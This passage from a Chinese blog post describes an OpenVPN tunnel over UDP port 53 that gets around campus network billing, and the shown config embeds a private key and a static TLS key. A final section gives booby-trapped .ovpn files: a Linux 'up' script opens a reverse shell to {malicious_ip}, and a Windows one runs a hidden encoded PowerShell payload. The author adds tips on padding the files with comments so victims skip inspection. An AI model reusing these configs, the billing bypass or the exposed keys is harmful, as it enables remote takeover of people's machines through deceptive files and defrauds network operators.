e8WxppB/a8HTqlVACQnRDuKB1esblN8kJg8iBZKsDWZmFm+VMc4Q0yeFGPwOn2Rk
34vctKcGVa+TAoIBAHjHwW7LZJ8bDnSwmj7yr8gOkIPlb9WxbPvSazOAexrHFnPy
bezsfV/4aOLC3ikzdywi8tCogFHpigsFXmxiRkiD+deDhyZ1llvNuceBP8MXJdWs
D8V98cr42w2rs8Br8dyLF+7OnRT4CTOSqca1oElawRNaDJc5qh69dMK3m6Jcz7Q5
1qziNO5EArX77L4kOuBFcElGnnsfZOw/+WRvhcX0TggrqjXPHl+f7aUyyyUFQr5u
plZyUjq459COgv6HOjxiXD90bzvFYzIaFbpSF52nz/fCq+ShkA8EUC556xh3Iyej
inU1xTpAmZd7sroVg3zLwAklgQqi61IrYlKEwVECggEAYJzB5K62KZzL9XF2/ckr
7KVLlezp1gZUpOl3HeYfGG8RjitH++2Lj+IAjrOIRyCZG2F0rpy0/HC/Vu2C1W2R
wIGJZjIivsVBBs+I3b81fmhB8aDvZPagtHH7S28S6iQI21SawvoBCV5jKX+t71Iy
36yZbWGmyF6NwcBRhd+EA7dcx3BMERglE9PNPodAY4JhGjdf2gyGiSE+zPooiiGo
kGKpDqqGWVtT+T4d0NsKqKIzKmCGs0F/LCYE6g4Qfbp8ebSB/9SbxqGY672O9J6I
RffAVG5x55zoMgaO1c5Z+t/Tt0OiB2lEIst0zovKBeXw4Cy6+MvzSZPd1N7AzWpU
bwKCAQEA3fWmiv5dwSgQFVtOtJwOSs6ciTq2rOwDtAbmd4dXwkPiHwO6wgwmZjyc
UeRn4qF24R8Q9tgR57bTU4Omgw7sK9hwkeGBAoRq8T2kB6r6es1fre7fC09czFga
gQ+wYgd8sKvFp8058agvwXMJPWD83WSHI/yWFKK1CkJrAarpz4TyMyWa6WfzdZbN
OSY6aeWGzKXDHbGV+XAHc5Qf2DT7vFz4bGe8+z4ShUgNSCd0AOIjv3ZXK8JVP+yz
27tZ2sBG8Kd4HazRdxhmECJNfJ8lfuDJc5lf49UVVG12IzxkgeHAavAo/bUfUUyZ
eOCaPoF1Ivz8OlAB4m28CQUGsw8DgA==
-----END PRIVATE KEY-----
</key>
remote-cert-tls server
key-direction 1
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
9275404a741d41d12858838452a59778
7d1166b1c88e681212c10dc87b26a319
25130d277289d9e0b071370edf50c476
6b36e5372a896051ae814a291dbc09f4
e95d1baca351c998a26746ee726eda37
4cc189024c85da2be377e7ccb6673998
47152751fa1f8dda7270eb09c2adf114
5bdaa6ca4d9923b5849d0e33ed5ecb09
b800def55d307fc7b7498f74bef6dda5
6d59c8ac1b640e2d2192ae0066dcdf46
7ef96ac1423e43d90390b8b01df745af
142bc0b5cec18ba810c3313a5cd3b106
c325fa3597369e704032a97e63e63ceb
5d5db71a2fd0306eac39cd5fb9b116bb
30d937e4135a7eee5d03212f52aa5438
7bf1da3899fce6c63aba1610d9870ee7
-----END OpenVPN Static key V1-----
</tls-auth>
cipher AES-256-CBC

comp-lzo
verb 3

经过测试,发现访问其他网站或服务的时候IP地址已经变成了vps的地址,而且无论是手机端openvpn还是PC端openvpn都可以使用,多个客户端可以相互ping通。如果您已经做到了这一步,那么恭喜,组网已经成功了。

这个方法在学校可以免流!!!本地可以直接在没有登录验证系统的情况下连接VPN,之后的流量会将本地电脑和vps通过udp53端口进行组网,成功之后依旧通过udp53进行通信,于是之后的流量就自然不需要付费了。如果还嫌不够安全的话,可以进一步利用防火墙限制VPN登录ip地址、利用规则等限制VPN登录的客户端数目、配置IPSec规则继续施加保护等等。

强调一下,请妥善保存ovpn配置文件,不要泄露,也最好不要和陌生人的机器组网。

另外,如果需要将udp改为tcp(这个操作会导致校园网无法免流),只需要对配置文件 client-allinone.ovpn 进行小修改:

  • Change proto udp to proto tcp

  • Change remote xxx.xxx.xxx.xxx 53 to remote xxx.xxx.xxx.xxx {tcp_port}

  • Change <tls-auth> to <tls-crypt>

  • Change </tls-auth> to </tls-crypt>

另外,如果需要使用账号/密码登录(方便或是提高安全性)或者是多用户的情况(如果直接用密钥文件认证来进行多用户的操作,很容易因为vps端的路由冲突不得不重启服务),篇幅所限,可参考该文章

在参考文章基础上,向单个配置文件 client-allinone.ovpn加入auth-user-passauth-nocache两行即可使之跳出账号认证。

另外,openvpn完全可以打一个ipv6的隧道(只要有公网ipv6的地址),应该也可以实现免流,同样,限制速度的是vps的带宽。该网站提供了一个能够为自己的ipv4主机申请ipv6地址的方法,但是我没有成功。如果没有其他方法白嫖的话,这种方法不够经济。

ps:其实以上操作的目的并不只是绕过校园网,取这个标题只是噱头罢了。它其实一方面可作为套娃式马甲,另一方面直接组网而避免使用其他不太保险的内网穿透手段。当然,这样的组网方式就能够把自己所有的设备集中到一个内网中——再配置些服务,一个手机就能相对安全地操控好几台电脑,玩法丰富——你甚至可以在手机上访问自己寝室的虚拟机桌面、查询自己的社工库、远程跑脚本、互相传文件……

感觉以现在的表述水平写这篇文章还是差了些许火候,献丑了。如有错误或不解,请直接留言。

还参考了几篇文章:

https://www.cnblogs.com/fjping0606/p/6601234.html

https://www.jianshu.com/p/a9b670200428

https://www.centos.bz/2016/10/establish-a-tunnel-with-openvpn/

https://blog.sorz.org/p/openvpn-traversal/

http://blog.joylau.cn/2020/05/28/OpenVPN-Config/

黑色彩蛋

这部分和上面关联不大,主要介绍利用ovpn文件反弹shell的方法。

其实不可信的ovpn文件非常危险,这一点可以作为钓鱼——某些入侵心切的人得到了你的ovpn文件就希望直接接入你的内网而疏于检查ovpn文件,然后就被反杀了。

构造恶意的ovpn文件非常简单,比如对付Linux的:

1
2
3
4
5
6
7
client
dev tun
proto udp
remote xxx.xxx.xxx.xxx 53
script-security 2
up "/bin/bash -c '/bin/bash -i >& /dev/tcp/{malicious_ip}/{port} 0<&1 2>&1'"
...

当然还有对付Windows的:

1
2
3
4
5
6
7
8
9
10
11
12
client
dev tun
proto udp
remote xxx.xxx.xxx.xxx 53
script-security 2
setenv k0 {malicious_powershell_base64_divided}
setenv k1 {malicious_powershell_base64_divided}
setenv k2 {malicious_powershell_base64_divided}
setenv k3 {malicious_powershell_base64_divided}
setenv kk 'start /min /b powershell /w hidden /enc %k0%%k1%%k2%%k3%'
up 'C:\\Windows\\System32\\cmd.exe /c "(%kk%)|cmd"'
verb 0

最好还要结合各种注释来使得对方没有任何检查文件的耐心,最终让对方执行了文件,可能发现了些许异常,但为时已晚。

脚本武器化参考文章:https://forum.90sec.com/t/topic/1289